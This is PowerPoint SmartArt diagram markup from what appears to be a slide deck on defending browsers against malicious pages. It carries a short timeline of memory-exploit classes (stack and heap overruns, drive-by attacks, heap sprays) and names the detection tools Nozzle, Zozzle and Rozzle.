      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" type="pres">
      <dgm:prSet presAssocID="{42CA8381-D83C-49DC-A535-FD3A5A28033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E48C75-D016-4F08-9F51-B3D240ACF8EC}" type="pres">
      <dgm:prSet presAssocID="{9BF7A25B-01D9-44DE-AAAA-07B6F5059E80}" presName="Parent" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2" custLinFactNeighborX="-2247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70CD44F-31FA-458A-99A0-9DA364AC4E8D}" type="pres">
      <dgm:prSet presAssocID="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" presName="Accent" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2" custAng="20714079"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F98C0AC3-421E-4976-8531-27C2CAAC5D6E}" type="pres">
      <dgm:prSet presAssocID="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" presName="Image1" presStyleLbl="fgImgPlace1" presStyleIdx="0" presStyleCnt="3" custScaleX="71570" custScaleY="71570"/>
      <dgm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836B8372-1AC1-4C30-9C91-27561FA2BC32}" type="pres">
      <dgm:prSet presAssocID="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" presName="Child1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3" custScaleX="1267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9931B-DD10-4453-9AAE-2E9B095ADB05}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" presName="Image2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" presName="Image" presStyleLbl="fgImgPlace1" presStyleIdx="1" presStyleCnt="3" custScaleX="64023" custScaleY="64023"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95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74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4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74F5A-E13F-4EA9-873E-C68EC610C1F8}" type="pres">
      <dgm:prSet presAssocID="{F85D88E0-5569-483C-B80D-52DADDD67C86}" presName="Image3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{69074874-D740-4421-B6B9-9D999C367698}" type="pres">
      <dgm:prSet presAssocID="{F85D88E0-5569-483C-B80D-52DADDD67C86}" presName="Image" presStyleLbl="fgImgPlace1" presStyleIdx="2" presStyleCnt="3" custScaleX="115080" custScaleY="115080"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="tx2"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{16E1C02D-E7D5-45FC-B787-772B2C997025}" type="pres">
      <dgm:prSet presAssocID="{F85D88E0-5569-483C-B80D-52DADDD67C86}" presName="Child3" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3" custScaleX="148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1D92D9-7C37-4EB5-A31C-23FFD024221C}" type="presOf" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{EA4E4D66-506E-490A-BF91-791CBD332AC8}" srcId="{9BF7A25B-01D9-44DE-AAAA-07B6F5059E80}" destId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" srcOrd="1" destOrd="0" parTransId="{0D7E027F-477F-47C6-ACB2-38976E637203}" sibTransId="{E7F67361-B7B8-4C78-959C-9D8810C47A70}"/>
    <dgm:cxn modelId="{66510539-223B-43A8-BBD7-5A7460B974BE}" srcId="{9BF7A25B-01D9-44DE-AAAA-07B6F5059E80}" destId="{F85D88E0-5569-483C-B80D-52DADDD67C86}" srcOrd="2" destOrd="0" parTransId="{17C3F4A5-BF4E-4D83-B70D-B4035F1B932E}" sibTransId="{9B4F3F4F-2344-4DC5-AD50-6D29D9598234}"/>
    <dgm:cxn modelId="{DF93A155-5BDD-4611-A394-CF6107C53A27}" type="presOf" srcId="{42CA8381-D83C-49DC-A535-FD3A5A280337}" destId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{B1FFD44C-3621-4ED4-8856-C4BB9AB5A253}" srcId="{9BF7A25B-01D9-44DE-AAAA-07B6F5059E80}" destId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" srcOrd="0" destOrd="0" parTransId="{1AEA54FF-D9A7-4E97-9159-E0DF0DEDADB4}" sibTransId="{912AD743-EC93-45A9-9163-A14A9AA5C912}"/>
    <dgm:cxn modelId="{3F8C65DD-D8C5-406B-A922-F54DD0663013}" type="presOf" srcId="{9BF7A25B-01D9-44DE-AAAA-07B6F5059E80}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{22605CEB-1FBA-453E-A9A3-04B5D148C5D6}" type="presOf" srcId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{481F58EA-85B8-4608-8BA8-027EA0ADCF80}" srcId="{42CA8381-D83C-49DC-A535-FD3A5A280337}" destId="{9BF7A25B-01D9-44DE-AAAA-07B6F5059E80}" srcOrd="0" destOrd="0" parTransId="{98B882BC-ED9D-47E4-8D8F-3EA7843A2B4C}" sibTransId="{20716AAD-8A1A-40DE-8DD4-C9C0C0B4E5AB}"/>
    <dgm:cxn modelId="{B320B2EA-E201-4E0B-8D2A-3C784208AFAF}" type="presOf" srcId="{F85D88E0-5569-483C-B80D-52DADDD67C86}" destId="{16E1C02D-E7D5-45FC-B787-772B2C997025}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{CE88813D-44AF-44A3-9CFB-00BF8B3CDBFB}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{01069213-28EF-4B2D-8CC1-F7C2A73F08CF}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{170CD44F-31FA-458A-99A0-9DA364AC4E8D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{B70CE536-C588-4EA6-BCE2-0984BB77A65F}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{F98C0AC3-421E-4976-8531-27C2CAAC5D6E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{CAC88163-5219-4751-94F5-CB8BFA24E0C6}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{DB354AC5-94E6-4C51-A8D2-F3FA49F27B79}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{190F6610-215E-4244-A346-7FE992540E71}" type="presParOf" srcId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" destId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{89E7B924-5365-4C01-848F-20C4FD71DD07}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{5A835222-13D3-4BEA-ABD0-B5D22595FF55}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{C8801F06-D5C3-4762-8F56-5E047653569D}" type="presParOf" srcId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" destId="{69074874-D740-4421-B6B9-9D999C367698}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{6D130F46-7CCE-40C3-89C1-A4DDC8D4CA7A}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{16E1C02D-E7D5-45FC-B787-772B2C997025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5DF1DF-0797-49C0-8054-1E1A4C3C49DA}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList" loCatId="officeonlin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60083F-1F79-4320-956C-900E6E2B2DAA}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr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/>
            <a:t>Memory-based</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>exploits</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3748507-E8D8-44F9-92BF-95914B204B1F}" type="parTrans" cxnId="{0465BB71-9D89-4E5E-9D62-01BA5D5B73EE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{208B271A-484E-4DED-819D-3CB6963BB210}" type="sibTrans" cxnId="{0465BB71-9D89-4E5E-9D62-01BA5D5B73EE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FA621B58-83F6-4EE2-982F-F0790781B6E3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>      </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>2000</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>       </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Stack-based</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t> overruns</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0971A6C6-7611-4C5E-9E9E-C79FDE90061E}" type="parTrans" cxnId="{27111657-4ED5-444B-9CF4-A70EA1ABF241}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{38E699AE-32B0-4905-AB29-8A6EB4DA4B58}" type="sibTrans" cxnId="{27111657-4ED5-444B-9CF4-A70EA1ABF241}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3518A968-0A66-438A-8853-AED50A0CEE7C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>     </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>2002</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>      </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Heap-based</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t> overruns</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C783C43E-C2E5-436E-9013-B2AA38CFB91A}" type="parTrans" cxnId="{66D0550C-0144-46DD-9973-3E4280428224}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C858CF30-CFCA-41BC-BDE1-C751651DCD11}" type="sibTrans" cxnId="{66D0550C-0144-46DD-9973-3E4280428224}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{40EECBC4-5BCB-4239-979D-0782093EDC5C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>                         2005</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>      </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Drive-by</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t> attacks and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>heap sprays</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{369F9C83-0B8A-4C94-81D1-1B9D5E520B57}" type="parTrans" cxnId="{D865D1F6-48C4-4DC2-8BEC-41488325524C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A46FF5DC-BAC2-4BAE-AA86-9FF6C556EB14}" type="sibTrans" cxnId="{D865D1F6-48C4-4DC2-8BEC-41488325524C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{80160A6B-C5B3-4D05-A57E-B4DF2BC3D389}" type="pres">
      <dgm:prSet presAssocID="{F65DF1DF-0797-49C0-8054-1E1A4C3C49D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AA29513-A1D5-4D77-8C66-88C889C62D52}" type="pres">
      <dgm:prSet presAssocID="{7160083F-1F79-4320-956C-900E6E2B2DAA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CE6F23F4-00BC-40E5-87D3-955B84FFD8B0}" type="pres">
      <dgm:prSet presAssocID="{FA621B58-83F6-4EE2-982F-F0790781B6E3}" presName="Accent" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D2404882-DD14-4BA4-88D4-4CE7C8D52CD2}" type="pres">
      <dgm:prSet presAssocID="{FA621B58-83F6-4EE2-982F-F0790781B6E3}" presName="Image1" presStyleLbl="fgImgPlace1" presStyleIdx="0" presStyleCnt="3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6E5D067-3D1F-4EA7-A229-15A6123FB46D}" type="pres">
      <dgm:prSet presAssocID="{FA621B58-83F6-4EE2-982F-F0790781B6E3}" presName="Child1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3" custScaleX="329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01B34-ACEC-403E-B941-79AB8183FDCA}" type="pres">
      <dgm:prSet presAssocID="{3518A968-0A66-438A-8853-AED50A0CEE7C}" presName="Image2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FAD35638-A429-4DD1-BB50-A83F5A823278}" type="pres">
      <dgm:prSet presAssocID="{3518A968-0A66-438A-8853-AED50A0CEE7C}" presName="Image" presStyleLbl="fgImgPlace1" presStyleIdx="1" presStyleCnt="3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880A3A6-79AD-4272-9C48-7820D3E1CBCD}" type="pres">
      <dgm:prSet presAssocID="{3518A968-0A66-438A-8853-AED50A0CEE7C}" presName="Child2" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3" custScaleX="329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F366F-D3DA-457F-A624-59D325E99844}" type="pres">
      <dgm:prSet presAssocID="{40EECBC4-5BCB-4239-979D-0782093EDC5C}" presName="Image3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7D22A50F-E370-48F7-A763-3AFEC30AE2CD}" type="pres">
      <dgm:prSet presAssocID="{40EECBC4-5BCB-4239-979D-0782093EDC5C}" presName="Image" presStyleLbl="fgImgPlace1" presStyleIdx="2" presStyleCnt="3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80C2106-E3C6-45F7-BE61-F085F69BFF2A}" type="pres">
      <dgm:prSet presAssocID="{40EECBC4-5BCB-4239-979D-0782093EDC5C}" presName="Child3" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3" custScaleX="5275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CC5E2F-C9C3-4689-839F-C421A48F77F8}" type="presOf" srcId="{F65DF1DF-0797-49C0-8054-1E1A4C3C49DA}" destId="{80160A6B-C5B3-4D05-A57E-B4DF2BC3D389}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{D865D1F6-48C4-4DC2-8BEC-41488325524C}" srcId="{7160083F-1F79-4320-956C-900E6E2B2DAA}" destId="{40EECBC4-5BCB-4239-979D-0782093EDC5C}" srcOrd="2" destOrd="0" parTransId="{369F9C83-0B8A-4C94-81D1-1B9D5E520B57}" sibTransId="{A46FF5DC-BAC2-4BAE-AA86-9FF6C556EB14}"/>
    <dgm:cxn modelId="{27111657-4ED5-444B-9CF4-A70EA1ABF241}" srcId="{7160083F-1F79-4320-956C-900E6E2B2DAA}" destId="{FA621B58-83F6-4EE2-982F-F0790781B6E3}" srcOrd="0" destOrd="0" parTransId="{0971A6C6-7611-4C5E-9E9E-C79FDE90061E}" sibTransId="{38E699AE-32B0-4905-AB29-8A6EB4DA4B58}"/>
    <dgm:cxn modelId="{27CD258C-D389-4752-ACA9-4B3E1039C57C}" type="presOf" srcId="{40EECBC4-5BCB-4239-979D-0782093EDC5C}" destId="{880C2106-E3C6-45F7-BE61-F085F69BFF2A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{031FC944-9BC4-490E-BEE9-53AD7A22BD94}" type="presOf" srcId="{FA621B58-83F6-4EE2-982F-F0790781B6E3}" destId="{36E5D067-3D1F-4EA7-A229-15A6123FB46D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{0465BB71-9D89-4E5E-9D62-01BA5D5B73EE}" srcId="{F65DF1DF-0797-49C0-8054-1E1A4C3C49DA}" destId="{7160083F-1F79-4320-956C-900E6E2B2DAA}" srcOrd="0" destOrd="0" parTransId="{A3748507-E8D8-44F9-92BF-95914B204B1F}" sibTransId="{208B271A-484E-4DED-819D-3CB6963BB210}"/>
    <dgm:cxn modelId="{F78D2C6E-A998-423A-84E6-EC0B79BE0B41}" type="presOf" srcId="{3518A968-0A66-438A-8853-AED50A0CEE7C}" destId="{F880A3A6-79AD-4272-9C48-7820D3E1CBCD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{31847B8B-DF4E-4102-99E3-C86FF53C1ABF}" type="presOf" srcId="{7160083F-1F79-4320-956C-900E6E2B2DAA}" destId="{DAA29513-A1D5-4D77-8C66-88C889C62D52}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{66D0550C-0144-46DD-9973-3E4280428224}" srcId="{7160083F-1F79-4320-956C-900E6E2B2DAA}" destId="{3518A968-0A66-438A-8853-AED50A0CEE7C}" srcOrd="1" destOrd="0" parTransId="{C783C43E-C2E5-436E-9013-B2AA38CFB91A}" sibTransId="{C858CF30-CFCA-41BC-BDE1-C751651DCD11}"/>
    <dgm:cxn modelId="{042EE1A5-F2A1-4A90-9767-9BB257CA793B}" type="presParOf" srcId="{80160A6B-C5B3-4D05-A57E-B4DF2BC3D389}" destId="{DAA29513-A1D5-4D77-8C66-88C889C62D52}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{34FF387F-5328-4214-A9E7-C1ADB9C8F7B2}" type="presParOf" srcId="{80160A6B-C5B3-4D05-A57E-B4DF2BC3D389}" destId="{CE6F23F4-00BC-40E5-87D3-955B84FFD8B0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{29699E57-D4AB-474D-A4C8-A06D45A5C715}" type="presParOf" srcId="{80160A6B-C5B3-4D05-A57E-B4DF2BC3D389}" destId="{D2404882-DD14-4BA4-88D4-4CE7C8D52CD2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{8B522A8B-F2B7-4FEE-802E-EA8C7CA6A1D7}" type="presParOf" srcId="{80160A6B-C5B3-4D05-A57E-B4DF2BC3D389}" destId="{36E5D067-3D1F-4EA7-A229-15A6123FB46D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{CB142F3D-EAE2-44B3-AC29-5B4CA0E10A1B}" type="presParOf" srcId="{80160A6B-C5B3-4D05-A57E-B4DF2BC3D389}" destId="{DA901B34-ACEC-403E-B941-79AB8183FDCA}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{F9CCDE82-F2F4-467D-8F7D-8AF28FE05A7D}" type="presParOf" srcId="{DA901B34-ACEC-403E-B941-79AB8183FDCA}" destId="{FAD35638-A429-4DD1-BB50-A83F5A823278}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{5F09E6F6-0523-4E2C-B2D4-9E603A00795A}" type="presParOf" srcId="{80160A6B-C5B3-4D05-A57E-B4DF2BC3D389}" destId="{F880A3A6-79AD-4272-9C48-7820D3E1CBCD}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{C7A82F4A-242E-4066-B92D-36F75037FB83}" type="presParOf" srcId="{80160A6B-C5B3-4D05-A57E-B4DF2BC3D389}" destId="{652F366F-D3DA-457F-A624-59D325E99844}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{77077A7F-DBFE-4CAD-838A-A04F8DA2D415}" type="presParOf" srcId="{652F366F-D3DA-457F-A624-59D325E99844}" destId="{7D22A50F-E370-48F7-A763-3AFEC30AE2CD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{2DFC8600-7A00-4652-A1A4-AC50EDD6D2DA}" type="presParOf" srcId="{80160A6B-C5B3-4D05-A57E-B4DF2BC3D389}" destId="{880C2106-E3C6-45F7-BE61-F085F69BFF2A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685796" y="1348644"/>
          <a:ext cx="2153799" cy="18517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01213" y="1619827"/>
        <a:ext cx="1522965" cy="1309389"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{170CD44F-31FA-458A-99A0-9DA364AC4E8D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="59092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3256007" y="381538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4497322" y="400095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Goal</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0"/>
            <a:t>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 smtClean="0"/>
            <a:t>Protect users from evil pages</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4497322" y="400095"/>
        <a:ext cx="1544403" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3701954" y="1694520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949703" y="1710814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Approach</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0"/>
            <a:t>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000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Crawl pages</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4949703" y="1710814"/>
        <a:ext cx="1544403" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{69074874-D740-4421-B6B9-9D999C367698}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3256007" y="3026058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497322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Blacklist</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0"/>
            <a:t> malicious ones</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4497322" y="3049593"/>
        <a:ext cx="1544403" cy="11170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383688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699105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>
          <a:off x="-243014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2718197" y="145769"/>
          <a:ext cx="1625205" cy="1625659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3138619" y="400095"/>
          <a:ext cx="3657595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            </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="6000" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Nozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4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138619" y="400095"/>
        <a:ext cx="3657595" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3617563" y="1912297"/>
          <a:ext cx="718366" cy="718567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647596" y="1710814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Zozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="40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647596" y="1710814"/>
        <a:ext cx="1544403" cy="1117007"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{69074874-D740-4421-B6B9-9D999C367698}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3171616" y="3243835"/>
          <a:ext cx="718366" cy="718567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195215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Rozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="40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195215" y="3049593"/>
        <a:ext cx="1544403" cy="11170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24302-0FEE-4A65-9627-5399FD6B15F4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  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
